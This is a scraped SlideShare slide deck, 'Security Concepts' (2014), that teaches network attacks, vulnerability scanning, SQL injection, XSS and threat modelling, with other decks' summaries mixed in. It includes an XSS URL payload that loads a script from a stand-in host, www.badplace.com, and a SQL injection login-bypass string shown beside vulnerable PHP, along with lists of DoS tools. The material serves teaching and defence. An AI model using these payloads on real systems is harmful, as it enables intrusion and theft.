SlideShare a Scribd company logo
SECURITY CONCEPTS
Dec 2014
• According to the Internet Storm Center (http://isc.sans.org),a computer
connected to the Internet has an average of 5 minutesbefore it falls under some
form of attack.
CURRENT STATISTICS
• http://securelist.com/statistics/
Security concepts

Recommended for you

Security Basics
Security BasicsSecurity Basics
Security Basics

This document discusses the importance of security for computers and networks. It identifies common security threats both internal and external, such as employees, hackers, viruses, worms, and social engineering. The document also outlines different types of attacks including physical theft or damage of equipment, data theft or corruption, and various forms of malware like adware, spyware, phishing, trojans, and rootkits. Finally, it recommends security procedures like creating strong passwords, developing security policies, and maintaining up-to-date software and antivirus protection.

Computer security and
Computer security andComputer security and
Computer security and

This document discusses various topics related to computer security including risks, attacks, safeguards, and ethics. It describes common security threats like viruses, hacking, denial of service attacks, and information theft. It also outlines methods to identify users, protect against threats, and investigate security incidents through digital forensics. Safeguards include firewalls, antivirus software, encryption, and physical access controls.

Computer security
Computer securityComputer security
Computer security

Security involves protecting computer resources from unauthorized access and natural disasters. It defines users' rights to keep personal data private. Most data damage is caused by errors and omissions, so organizations need accurate data for transactions, services, and decisions. Proper security controls are needed to prevent dishonest programmers from easily modifying software or stealing data. Security also addresses risks from misuse of computer resources, fires, floods and other natural disasters.

AGENDA:
1. Network Security
2. Threats and Vulnerability
3. Application, Data and Host Security
4. Security Threat Modelling
5. Penetration Testing
1. NETWORK SECURITY
NETWORK SECURITY PRINCIPLE
• Confidentiality: only sender, intended receiver should “understand” message
contents
o sender encrypts message
o receiver decrypts message
• Authentication: sender, receiver want to confirm identity of each other
• Message Integrity: sender, receiver want to ensure message not altered (in
transit, or afterwards) without detection
• Access and Availability: services must be accessible and available to users
NETWORK SECURITY THREATS

Recommended for you

4.2.1 computer security risks
4.2.1 computer security risks4.2.1 computer security risks
4.2.1 computer security risks

This document discusses computer security risks. It defines computer security risks as events that could cause loss or damage to computer systems. It then identifies and describes various types of security risks like internet and network attacks (e.g. malware, botnets, denial of service attacks), unauthorized access, hardware and software theft, information theft, and system failures. Specific malware types are also defined, including viruses, worms, Trojan horses, rootkits, and spyware.

Computer security threats & prevention
Computer security threats & preventionComputer security threats & prevention
Computer security threats & prevention

Computer security threats & prevention,Its a proper introduction about computer security and threats and prevention with reference. Have info about threats and their prevention.

securitythreatscomputer
Computer Security
Computer SecurityComputer Security
Computer Security

F. Questier, Computer security, workshop for Lib@web international training program 'Management of Electronic Information and Digital Libraries', university of Antwerp, October 2015

securitycomputer securityrisks
FRIENDS AND ENEMIES: ALICE, BOB, TRUDY
• well-known in network security world
• Bob, Alice (lovers!) want to communicate “securely”
• Trudy (intruder) may intercept, delete, add messages
secure
sender
secure
receiver
channel data, control
messages
data data
Alice Bob
Trudy
data
8-
Who might Bob, Alice be?
• … well, real-life Bobs and Alices!
• Web browser/server for electronic transactions (e.g., on-line
purchases)
• on-line banking client/server
• DNS servers
• routers exchanging routing table updates
• other examples?
Security concepts
8-

Recommended for you

Computer security risks
Computer security risksComputer security risks
Computer security risks

This document discusses various computer security risks and precautions users can take. It defines different types of threats like hackers, crackers, and cybercriminals. It also explains different attacks like cyberterrorism and how viruses can spread. The document recommends precautions like not opening unexpected email attachments, using antivirus software, and updating signatures regularly to help safeguard against malware infections.

Network Security
Network SecurityNetwork Security
Network Security

The document discusses the importance of computer and network security for future computer technicians. It states that failure to implement proper security procedures can put private information, company secrets, financial data, computer equipment, and items of national security at risk. The document outlines some of a technician's primary responsibilities, which include configuring network settings to keep the network secure, applying software updates, and instructing users on good security practices. It also describes different types of security threats like physical attacks, data attacks, internal threats from employees, and external threats from unauthorized users.

Viruses, worms, and trojan horses
Viruses, worms, and trojan horsesViruses, worms, and trojan horses
Viruses, worms, and trojan horses

A computer virus attaches to code or files and spreads when the infected software runs or is transferred. A worm replicates itself across a network without needing to be attached to other programs. A Trojan horse appears benign but hides malicious code. Security procedures include plans to respond to threats, updating for new risks, and testing weaknesses. Antivirus software detects and removes viruses, worms and Trojans, requiring frequent updates. Encryption, firewalls, and port protection help secure data and traffic entering computers.

PRIVILEGE ESCALATION
APPLICATION LAYER ATTACK – LAYER 7
• HTTP: Virus, Worms, SQLInjection, XSS
• Malware: Trojans, Backdoors
SNIFFER ATTACK
• Wireshark
• CAIN and Abel
• TCPdump
• Kismet
• Dsniff
• etthercap
• Paros Proxy, Burp
proxy
MAN IN THE MIDDLE ATTACK

Recommended for you

Computer security
Computer securityComputer security
Computer security

Little analist about risk and threatens when you work with computer. And some tricks to make strong passwords.

botssecuritypasswords
Basic Security Chapter 1
Basic Security Chapter 1Basic Security Chapter 1
Basic Security Chapter 1

This document discusses basic security concepts, including definitions of security, assets, and the principle of easiest penetration. It describes three classifications of protection: prevention, detection, and reaction. Examples are given for physical and cyber security. The goals of security are defined as integrity, confidentiality, and availability. Common security threats are interruption, interception, modification, and fabrication. Vulnerabilities in computing systems can occur in data, software, hardware, and exposed assets. Methods of defense include encryption, software/hardware controls, policies, and physical controls. System access control and data access control are important methods for making systems secure using identification, authentication, and access authorization.

computer securitysecurity
Computer , Internet and physical security.
Computer , Internet and physical security.Computer , Internet and physical security.
Computer , Internet and physical security.

It refers to protection of a computer and the information stored in it, from the unauthorised users. Computer security is a branch of computer technology known as information security as applied to computers and networks. 

crackersinternet securitytcp/ip model
DOS ATTACK
DOS ATTACK TOOLS
• Jolt2
• Bubonic.c
• Land and LaTierra
• Targa
• Blast20
• Nemesy
• Panther2
• CrazyPinger
• Some Trouble
• UDP Flood
• FSM
• FSMax
REFLECTION DOS
The attacking machines send out huge volumes of SYN packets
but with the IP source address pointing to the target machine.
SMURF ATTACK

Recommended for you

BAIT1003 Chapter 11
BAIT1003 Chapter 11BAIT1003 Chapter 11
BAIT1003 Chapter 11

This document discusses computer security risks and safeguards. It describes various types of cybercriminals like hackers, crackers, and corporate spies. It also outlines different internet and network attacks such as viruses, worms, Trojan horses, and denial of service attacks. Finally, it provides tips to prevent unauthorized access through techniques like installing antivirus software, updating definitions, and inoculating program files. The overall document aims to define computer security risks and describe methods to protect against internet attacks, unauthorized access, and information theft.

23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkg

This document summarizes computer and network security threats. It discusses key security objectives of confidentiality, integrity and availability. It describes common security threats to hardware, software, data, and communication lines/networks. Examples of threats include theft, damage, alteration, and denial of service attacks. Different classes of intruders like masqueraders and misfeasors are also outlined. Common intrusion techniques and types of malicious software like viruses, worms, trojans and backdoors are defined. The document provides details on various goals and behaviors of attackers.

Threats to a computer
Threats to a computer Threats to a computer
Threats to a computer

This document is a project report submitted by Deeptika Soni on threats to computers. It discusses various types of threats like viruses, worms, hackers and their symptoms. It outlines system requirements and provides an index with sections on virus components, how threats are noticed, suggestions to prevent threats, and conclusions. The report references hardware and software vulnerabilities that can be exploited by interceptions, interruptions, modifications and fabrications. It notes threats involve theft, destruction or unauthorized access and tampering with computer assets.

MANGLE – INVALID PACKET ATTACK
Tools to simulate Invalid Packet attack
• Nmap
• Nessus
Tools to handle this
• Iptables(linux)
• Checkpoint
• Netfilter
• Application need to handle this
DDOS ATTACK
SYN FLOOD
TCP ATTACK
• Send multiple TCP Reset packet

Recommended for you

Computer security
Computer securityComputer security
Computer security

The document discusses various topics related to computer security including definitions of computer security, cyber security, and IT security. It defines key concepts like confidentiality, integrity, and availability. It also defines common security threats like unauthorized access, hackers, vulnerabilities, and attacks. It discusses security measures like antivirus software, firewalls, and provides examples of computer crimes and viruses.

different elements in computer securityhackingethical hacking
System security
System securitySystem security
System security

The document discusses system security and defines key related terms. System security is the ability of a system to protect itself from accidental or deliberate attacks. It is essential for availability, reliability, and safety as most systems are networked. Without proper security, systems are vulnerable to damage like denial of service, data corruption, and disclosure of confidential information. Security can be achieved through strategies such as avoiding vulnerabilities, detecting and eliminating attacks, and limiting exposure and enabling recovery from successful attacks.

securitycritical systemscybersecurity
Lecture5
Lecture5Lecture5
Lecture5

This document provides an overview of computer and web security concepts that will be covered in an IT security course. The course will cover topics such as encryption, digital signatures, firewalls, viruses, and access control methods. It defines computer security as protecting systems from threats to preserve confidentiality, integrity and availability of information and resources. It discusses the need for security due to increasing computer crimes, vulnerabilities, and risks from networks and systems being interconnected. Common security requirements like secrecy, integrity, authenticity, availability and access control are also introduced.

UDP ATTACK
BOTNET
• Exploit the system and make it botclient->Make
botnet server aware it has joined botnet->Install Anti-
anti virus module->Listen to botnet server for instruction
BUFFER OVERFLOW
A flaw that occurs when more data is written to a block of memory, or
buffer, than the buffer is allocated to hold.
ROGUE DHCP SERVER
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create
network problems

Recommended for you

Networking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric VanderburgNetworking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg
Networking Concepts Lesson 10 part 2 - Security Appendix - Eric Vanderburg

This document discusses various concepts related to network security. It covers topics such as understanding security costs, securing data both physically and virtually, planning network security strategies, and features of Windows operating systems that improve security such as Kerberos authentication, public key infrastructure (PKI), group policy, VPNs, and IPSec. It also discusses security tools and methods like firewalls, intrusion detection systems, honeypots, and how to protect against malicious code like viruses, Trojan horses, and worms.

computer networkingeric vanderburgcomputers
360suite Business Objects Xi3 New Security Concepts
360suite Business Objects Xi3 New Security Concepts360suite Business Objects Xi3 New Security Concepts
360suite Business Objects Xi3 New Security Concepts

The document discusses security concepts in SAP BusinessObjects (BO) Xi 3.x. It provides an overview of new features in BO Xi 3.x security including more granular rights that can be applied at the content level and folder level. It also notes challenges in migrating to or implementing the new security model such as understanding the new concepts and redesigning security models while limiting administration tasks.

r3xixi30
PACE-IT: Basic Network Concepts (part 2)
PACE-IT: Basic Network Concepts (part 2)PACE-IT: Basic Network Concepts (part 2)
PACE-IT: Basic Network Concepts (part 2)

CompTIA exam study guide presentations by instructor Brian Ferrill, PACE-IT (Progressive, Accelerated Certifications for Employment in Information Technology) "Funded by the Department of Labor, Employment and Training Administration, Grant #TC-23745-12-60-A-53" Learn more about the PACE-IT Online program: www.edcc.edu/pace-it

paceitcomptia
EAVESDROPPING
• Eavesdropping is secretly listening to the private
conversation of others without their consent, as defined
by Black's Law Dictionary.
• Unencrypted open wifi network
• Tool: Firesheep
SOCIAL ENGINEERING ATTACK
• Phishing is a technique of fraudulently obtaining private
information. Typically, the phisher sends an e-mail that
appears to come from a legitimate business—a bank, or
credit card company—requesting "verification" of
information and warning of some dire consequences if it is
not provided.
• Phone phishing uses a rogue IVR system to recreate a
legitimate-sounding copy of a bank or other institution's
IVR system.
• Baiting is like the real-world Trojan Horse that uses physical
media and relies on the curiosity or greed of the victim.
• Shoulder surfing involves observing an employee's private
information over their shoulder. This type of attack is
common in public places such as airports, airplanes or
coffee shops.
WORM
• Malicious software in the network
• A type of Man in middle attack
• Installed using rootkit
• Will spoof data, make network slow and create
network problems
ROOTKIT
A rootkit is a stealthy type of software, typically malicious, designed
to hide the existence of certain processes or programs from normal
methods of detection and enable continued privileged access to a
computer.

Recommended for you

PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)
PACE-IT, Security+ 4.2: Mobile Security Concepts and Technologies (part 2)

CompTIA exam study guide presentations by instructor Brian Ferrill, PACE-IT (Progressive, Accelerated Certifications for Employment in Information Technology) "Funded by the Department of Labor, Employment and Training Administration, Grant #TC-23745-12-60-A-53" Learn more about the PACE-IT Online program: www.edcc.edu/pace-it

paceitcomptia
PACE-IT, Security+1.2: Secure Network Administration Concepts
PACE-IT, Security+1.2: Secure Network Administration ConceptsPACE-IT, Security+1.2: Secure Network Administration Concepts
PACE-IT, Security+1.2: Secure Network Administration Concepts

CompTIA exam study guide presentations by instructor Brian Ferrill, PACE-IT (Progressive, Accelerated Certifications for Employment in Information Technology) "Funded by the Department of Labor, Employment and Training Administration, Grant #TC-23745-12-60-A-53" Learn more about the PACE-IT Online program: www.edcc.edu/pace-it

paceitcomptia
PACE-IT: Basic Network Concepts (part 1)
PACE-IT: Basic Network Concepts (part 1)PACE-IT: Basic Network Concepts (part 1)
PACE-IT: Basic Network Concepts (part 1)

CompTIA exam study guide presentations by instructor Brian Ferrill, PACE-IT (Progressive, Accelerated Certifications for Employment in Information Technology) "Funded by the Department of Labor, Employment and Training Administration, Grant #TC-23745-12-60-A-53" Learn more about the PACE-IT Online program: www.edcc.edu/pace-it

comptiapaceit
MAC FLOODING - ARP
In a typical MAC flooding attack, a switch is fed
many Ethernet frames, each containing different
source MAC addresses, by the attacker. The
intention is to consume the limited memory set
aside in the switch to store the MAC address table.
Tool: dsniff
DNS CACHE POISONING
DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain
Name System (DNS) resolver's cache, causing the name
server to return an incorrect IP address, diverting traffic to the
attacker's computer (or any other computer).
URL ENCODING OR CANONICALIZATION
Canonicalization is when a resource can be represented in more
than one manner.
Canonicalization of URLs occurs in a similar manner where
http://doman.tld/user/foo.gif and
http://domain.tld/user/bar/../foo.gif would represent the same
image file
Results in XSS and SQL Injection attack.
Cross-Site Scripting
Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];
URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution: <script src=”http://www.badplace.com/nasty.js”></script>
cheat sheet
PACKET TAPPING
• Hardware to monitor packet
• vssmonitoring.com

Recommended for you

Information Security Management. Security solutions copy
Information Security Management. Security solutions copyInformation Security Management. Security solutions copy
Information Security Management. Security solutions copy

Information Security Management. Introduction. By Yuliana Martirosyan, Based on Bell G. Reggard, Information Security Management. Concepts and Practices.

A review of network concepts base on CISCO by Ali Shahbazi
A review of network concepts base on CISCO by Ali ShahbaziA review of network concepts base on CISCO by Ali Shahbazi
A review of network concepts base on CISCO by Ali Shahbazi

This document summarizes network concepts based on a Cisco book. It discusses how PCs communicate, network devices like hubs and switches, IP and MAC addressing, the OSI model and its seven layers, network segmentation using bridges routers and gateways, Ethernet operations, and concepts like cut-through forwarding, interframe gap, carrier signals, and CSMA/CD. The document is presented as a review of key topics in networking and internetworking.

ccnaasiatechcisco
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security concepts

This document provides an overview of basic network and security concepts. It discusses TCP/IP, routing, DNS, NAT, firewalls, tunneling, and DMZs. It also covers web and security concepts such as proxies, reverse proxies, HTTP/HTTPS, and certificates. The document defines these terms and concepts at a high level to provide foundational understanding of computer networks and security.

network and security conceptslocal area networknetwork
MIME HEADER PARSING
• Several Win32 mass mailers send themselves via an email with
a MIME encoded malicious executable with a malformed
header, and the executable will silently execute unbeknownst
to the user.
• This occurs whenever Internet Explorer parses the mail and
thus can happen when simply reading or previewing email.
Thus, email worms can spread themselves without any user
actually executing or detaching a file.
http://www.kb.cert.org/vuls/id/980499
PACKET TAPPING
• Hardware to monitor packet
• vssmonitoring.com
REPLAY ATTACK
• A replay attack (also known as playback attack) is a form of network
attack in which a valid data transmission is maliciously or fraudulently
repeated or delayed.
KEYLOGGER
• Keystroke logging, often referred to as keylogging or keyboard
capturing, is the action of recording (or logging) the keys struck on a
keyboard
• There are numerous keylogging methods, ranging from hardware
and software-based.

Recommended for you

Basic Network Concepts
Basic Network ConceptsBasic Network Concepts
Basic Network Concepts

This document provides basic instructions for setting up and troubleshooting a simple computer network for file sharing. It explains that computers connect to an Ethernet switch via network adapters and have IP addresses to communicate. It describes how to check the IP address and default gateway using the ipconfig command on Windows, and how to test the connection by pinging the default gateway. Finally, it lists some basic troubleshooting steps like verifying the physical connection and IP address, checking which applications are working, and how to check proxy settings in Internet Explorer.

5G Wireless Technology - pavankumar_912
5G Wireless Technology - pavankumar_9125G Wireless Technology - pavankumar_912
5G Wireless Technology - pavankumar_912

This seminar discusses the evolution of mobile network generations from 1G to 5G. 5G is expected to offer speeds up to 1 Gbps, making it 10 times faster than previous generations. It will allow for complete wireless communication with almost no limitations. The key concepts of 5G include a real wireless world with no access or zone issues, the ability to simultaneously connect to multiple wireless technologies, smart radios, and IPv6 addressing. 5G will use technologies like ultra wide band networks, smart antennas, and code division multiple access. It is being designed as an open platform across network layers to provide the best quality of service at the lowest cost.

5gtechnologywireless
Network Security
Network SecurityNetwork Security
Network Security

While computer systems today have some of the best security systems ever, they are more vulnerable than ever before. This vulnerability stems from the world-wide access to computer systems via the Internet. Computer and network security comes in many forms, including encryption algorithms, access to facilities, digital signatures, and using fingerprints and face scans as passwords.

 
by MAJU
2. THREATS AND
VULNERABILITIES
Security concepts
Security concepts
TOP 10 VULNERABILITY SCANNER TOOLS
1. Nessus
2. openVAS
3. Core Impact
4. Nexpose
5. GFI Languard
6. Qualysguard
7. MBSA
8. Retina
9. Secunia
10. SAINT

Recommended for you

Basic concepts of computer Networking
Basic concepts of computer NetworkingBasic concepts of computer Networking
Basic concepts of computer Networking

The document discusses different types of computer network topologies. It defines network topology as the physical configuration of cables, computers, and other devices on a network. The key network topologies covered are bus, ring, star, and mesh. Advantages and disadvantages of each topology are summarized.

computers and internetcomputer networknetworking
Mobile security in Cyber Security
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber Security

The intention of this slide is to cover all the basics in Mobile Security in Cyber and Information Security (Network and Communication Security)

information securitycyber security malwares
Introduction to computer network
Introduction to computer networkIntroduction to computer network
Introduction to computer network

A computer network is defined as the interconnection of two or more computers. It is done to enable the computers to communicate and share available resources. Components of computer network Network benefits Disadvantages of computer network Classification by their geographical area Network classification by their component role Types of servers

cancomputerpeer-to-peer
VULNERABILITY RESEARCH WEBSITES
• http://www.kb.cert.org/vuls
• www.securitytracker.com
• www.microsoft.com/security
• www.securiteam.com
• www.packetstormsecurity.com
• www.hackerstorm.com
• www.hackerwatch.org
• www.securityfocus.com
• www.securitymagazine.com
VULNERABILITY SEARCH
• https://web.nvd.nist.gov/view/vuln/search
SOFTWARE EXPLOITATION
• Database
• Email
• Spyware – Join MS spynet using Windows
defender
• Rootkits -
http://www.liutilities.com/products/wintasks
pro/processlibrary.
SURVIVING MALICIOUS CODE
• Viruses
• Trojan Horses
• Logic Bombs
• Worms
• Antivirus Software

Recommended for you

Types of Attack in Information and Network Security
Types of Attack in Information and Network SecurityTypes of Attack in Information and Network Security
Types of Attack in Information and Network Security

In shared PPT we have discussed about different types of cyber security attacks how it works and how we can prevent it .

Web Security
Web SecurityWeb Security
Web Security

Gerald Z. Villorente presents on the topic of web security. He discusses security levels including server, network, application, and user levels. Some common web application threats are also outlined such as cross-site scripting, SQL injection, and denial-of-service attacks. The presentation provides an overview of aspects of data security, principles of secure development, and best practices for web security.

internet securityweb securitysecurity
Phases of penetration testing
Phases of penetration testingPhases of penetration testing
Phases of penetration testing

A penetration test involves four main phases: reconnaissance, scanning, exploitation, and maintaining access. In the reconnaissance phase, tools are used to gather information about the target system without authorization. Scanning identifies open ports and vulnerabilities. Exploitation attempts to gain unauthorized control of systems by exploiting vulnerabilities, such as using password crackers. Maintaining access involves creating backdoors for future unauthorized access, such as using network sniffing tools or installing rootkits. Popular tools used in penetration tests include Nmap for scanning, Metasploit for exploitation, and Netcat for creating backdoors. Defending against penetration tests requires monitoring information published online, properly configuring firewalls and access controls, patching systems, and using antivirus and intrusion detection software

pentest reconn scanning exploitation ma
ATTACK
• Access attack – Dumpster diving,
Eavesdropping, Snooping, Interception
• Modification and Repudiation attack
• DOS attack – ping of death, buffer overflow
• Botnets - http://www.microsoft.com/security/sir
COMMON ATTACKS
• Backdoor
• Spoofing
• Phishing
• Man-In-Middle attack
• Replay attack
• Password guessing
• Privilege escalation
3. APPLICATION, DATA AND HOST
SECURITY
APPLICATION AND DATA SECURITY
• Web Application
• OWASP Top 10 -
https://www.owasp.org/index.php/OWASP_Top_Ten_Che
at_Sheet
• Hacking Tools: Instant Source, Wget,WebSleuth
BlackWidow,WindowBomb,Burp,cURL

Recommended for you

DDOS ATTACKS
DDOS ATTACKSDDOS ATTACKS
DDOS ATTACKS

This document discusses distributed denial of service (DDoS) attacks. It begins with an introduction that defines DDoS attacks as attempts to make an online service unavailable by overwhelming it with traffic from multiple compromised sources. The document then covers the basics of DDoS attacks, common symptoms, how they work by exploiting vulnerabilities in systems to create botnets for launching attacks, and various methods like ICMP floods and SYN floods. It also discusses ways to handle DDoS attacks through defenses like firewalls, switches, and routers. The document concludes with preventative and reactive defense mechanisms to detect and respond to attacks.

defensemethodsddos attacks
Security and Linux Security
Security and Linux SecuritySecurity and Linux Security
Security and Linux Security

The document summarizes a presentation on network security and Linux security. The presentation covered introduction to security, computer security, and network security. It discussed why security is needed, who is vulnerable, common security attacks like dictionary attacks, denial of service attacks, TCP attacks, and packet sniffing. It also covered Linux security topics like securing the Linux kernel, file and filesystem permissions, password security, and network security using firewalls, IPSEC, and intrusion detection systems. The presentation concluded with a reference to an ID-CERT cybercrime report and a call for questions.

network securitylinuxlinux security
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx

The document discusses various types of malware attacks including DDoS attacks, botnets, and mitigations. It provides definitions and examples of different malware types such as viruses, worms, Trojan horses, rootkits, logic bombs, and ransomware. It also discusses how botnets are used to launch DDoS attacks and describes common DDoS attack countermeasures such as preventing initial hacks, using firewalls, and changing targeted IP addresses.

cyber attacks
SQL – TABLE NAME USERS
Name Age Email Password City
Ram 35 ram@abc.co
m
ram@123 Bangalore
Krishna 24 Krishna@nec.
com
098kkk Mysore
Parul 20 parul@gmail.
com
Pp234 chennai
Select age from users where name=‘Parul’;
Update users set email=‘ram@gmail.ocm’ where name=Ram;-- This is
comment
INSERT into users values (‘Puja’, 30, ‘puja@gmail.com’,’ppp123’,’Ooty’);
DROP TABLE users;
e.g PHP code
$result = mysql_query(“select * from users where(name=‘$user’ and
password=‘$pass’);”);
Add username as Bina’ OR 1=1);--
$result = mysql_query(“select * from users where(name=‘Bina’ OR 1=1);-- and
password=‘junkvalue’);”);
SQL INJECTION STATISTICS
http://web.nvd.nist.gov/view/vuln/statistics
SQL INJECTION COUNTERMEASURES
• Input validation
– Check it is in valid format - whitelisting
– Input Sanitization
 Blacklisting-avoid ‘ ; --
 Escaping problematic chars
 Use Prepared statements
$db=new mysql(“localhost”,”Sita”,”ssttpass”,”DB”);
$statement=$db->prepare(“select * from users
where(name=? And password=?);”);
$statement->bind_param(“ss”,$user, $pass);
$statement->execute();
CROSS SITE SCRIPTING

Recommended for you

Network sec 1
Network sec 1Network sec 1
Network sec 1

This document discusses network security. It covers security attacks like interruption, interception, modification and fabrication. It also discusses security services like confidentiality, integrity and availability. The document outlines common security mechanisms like encryption, software/hardware controls and firewalls. It provides examples of security attacks like denial of service, TCP hijacking and how mechanisms like firewalls, intrusion detection systems and IPSec can provide defenses.

Computer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptxComputer Network Case Study - bajju.pptx
Computer Network Case Study - bajju.pptx

This document discusses various computer network attacks and vulnerabilities. It covers topics like ransomware, IoT attacks, social engineering, man-in-the-middle attacks, denial of service attacks, distributed denial of service attacks, SQL injection, SSL stripping, URL misinterpretation, directory browsing, input validation vulnerabilities, and vulnerabilities in each layer of the OSI model. The goal is to provide an overview of common network attacks and how they can be carried out.

internetcomputernetworking
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths

This document discusses various types of network security attacks and methods to prevent them. It covers physical access attacks, social engineering attacks, penetration attacks like scanning and malware. It also discusses attacks on the OSI and TCP/IP models like at the session, transport and network layers. Prevention methods covered include firewalls, proxies, IPSec, security policies and hardening hosts. Specific switch and router vulnerabilities are examined like ARP poisoning, SNMP, spanning tree attacks. Countermeasures for switches include BPDU guard, root guard.

comptiabraindumpsmicrosoft
XSS
• Stored XSS
– Bad website->send malicious script to genuine web
server
– Client access genuine web server
– Run malicious script and sends data to attacker
• Reflected XSS attack
• Echoed input
• Prevention: Input validation
4. SECURITY THREAT MODELING
IMPORTANT KEYWORDS
• Threat Model
• Asset
• Threat
• Attack
• Attacker
• Impact
• Probability
• Mitigation
• Subject
IMPORTANT KEYWORDS CONTD…
• Object
• Action
• Intended Action
• Unintended Action
• Trust Boundary
• Subject/Object Matrix
• Actor/Action Matrix
• Data Flow Diagram
• Attack Tree
• IT Audit

Recommended for you

Tools and methods used in cybercrime
Tools and methods used in cybercrimeTools and methods used in cybercrime
Tools and methods used in cybercrime

The document discusses various tools and methods used in cybercrime, including proxy servers, anonymizers, phishing, password cracking, keyloggers, viruses, worms, Trojan horses, backdoors, steganography, denial of service attacks, SQL injection, and buffer overflows. It provides details on how each method works and how attackers use them to launch cyber attacks. The document also outlines the basic stages of a cyber attack, from initial reconnaissance to covering tracks.

Network And Application Layer Attacks
Network And Application Layer AttacksNetwork And Application Layer Attacks
Network And Application Layer Attacks

This Presentation covers details and demonstration of 2 Network Layer and 2 Application Layer Attacks: -DNS Cache Poisoning Attack -ICMP Flooding Attack (Volumetric Dos) - SQL Injection Attack -XML External Entity Attack

sql injectionxxepenetration testing
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation

This document discusses advanced persistent threats (APTs) and strategies for cyber defense. It describes APTs as advanced, persistent, and threatening adversaries that are formally tasked to accomplish missions. The document outlines the lifecycle of APT attacks, including establishing backdoors in networks, maintaining long-term control, and exfiltrating data using encryption. It provides examples of APT groups and tools they use, such as exploiting vulnerabilities to escalate privileges and dump cached credentials from Windows networks. The overall summary is that APTs are dangerous, organized adversaries requiring persistent cyber defense strategies.

(isc)2 hellenic chapter
THREAT MODELING
• Formal method to identify and enumerate risk
• Make informed risk decisions in regards to
– Actions
– Threats
– Mitigation against risk
WHAT CAN BE THREAT MODELED?
• Applications/ Software
• Systems
• Policies and Procedure
• Business Processes
• Anything….
WHEN TO DO THREAT MODELING
• Should be part of SDL
• Should be Iterative Process
• Whenever changes are made
RISK MANAGEMENT
• Risk Identification – incidents, bug reports,
testing
• Risk Enumeration & Classification – impact,
how and when it can occur, nature of risk
• Mitigation identification – cost benefit analysis
• Mitigation testing – Penetration testing, Third
party design review, procedural review and
management signoff, Legal review

Recommended for you

Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks

1. Network probes scan computer networks to gather information about services and vulnerabilities which can enable future attacks. 2. Privilege escalation attacks exploit software bugs to gain higher levels of access on a system, such as ordinary users accessing root privileges. 3. Denial of service (DoS) and distributed denial of service (DDoS) attacks aim to overwhelm network or system resources to interfere with normal operations.

Port of seattle security presentation david morris
Port of seattle security presentation   david morrisPort of seattle security presentation   david morris
Port of seattle security presentation david morris

This document discusses cyber security threats and recommendations for addressing them. It begins with an overview of the history of threats like Melissa in 1999 and Slammer in 2003. Today's threats are described as persistent, sophisticated, and targeted. The document then outlines the anatomy of a common attack involving phishing emails, drive-by downloads, gaining access to internal networks, and exfiltrating data. It recommends building a strong security foundation with controls and guidelines, developing an incident response plan, and establishing partnerships for assistance in responding to incidents.

Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008

BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Common attack techniques explored include man-in-the-middle attacks using ARP poisoning, password cracking through tools like John the Ripper, and "Google hacking" to find sensitive information online.

securityclubhackhacking
THREAT MODEL PROCESS OVERVIEW
• Define Use Scenarios
• Define Security Assumptions
• Create/Update data flow diagram
• System Decomposition
• Identify Threats
• Determine Risks
• Plan Mitigations
• Iterate Threat Model
THREAT MODEL PROCESS METHODOLOGIES
• Microsoft STRIDE/DREAD
• NSA’s InfoSec Assessment Methodlogy
• CERT’s Octave
STRIDE
• Spoofing
• Tempering
• Repudiation
• Information Disclosure
• Denial of Service
• Escalation of Privilege
DREAD
• Damage Potential
• Reproducibility
• Exploitability
• Affected Users
• Discoverability

Recommended for you

Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008

BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Common attack techniques explored include man-in-the-middle attacks using ARP poisoning, password cracking through tools like John the Ripper, and hacking web servers through techniques like Google hacking.

securityclubhackhacking
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD

BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Attackers can use these tools along with techniques like ARP poisoning to conduct remote exploits or hack passwords on Windows systems.

PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo -  Guide to Building Secure InfrastructuresPLNOG 8: Merike Kaeo -  Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures

This document provides a summary of techniques to secure network infrastructure. It discusses protecting devices through secure access controls, filtering infrastructure to permit only required protocols, securing routing protocols through authentication and prefix filtering, securing MPLS through design rules and ACLs, and securing DNS through techniques like DNSSEC to prevent cache poisoning and unauthorized updates. The document outlines common attacks like spoofing, hijacking, and denial of service and recommends mitigation strategies across the network, routing, and application layers.

telcoictconference
IAM
• Designed by NSA
• Used by US Federal Government
• Assessment broken into 10 different areas
